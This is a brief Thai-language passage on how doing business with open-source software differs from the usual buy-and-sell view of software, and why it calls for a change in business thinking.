สิ่งที่คนทำธุรกิจคุ้นชินคือ การมองซอฟต์แวร์เป็นสินค้าตัวหนึ่ง ซื้อมา ขายไป ซึ่งลักษณะการทำธุรกิจของ OSS มีความซับซ้อนกว่านั้น ดังนั้น การทำธุรกิจที่เกี่ยวข้องกับ OSS ต้องมีการปรับกระบวนการคิดพอสมควร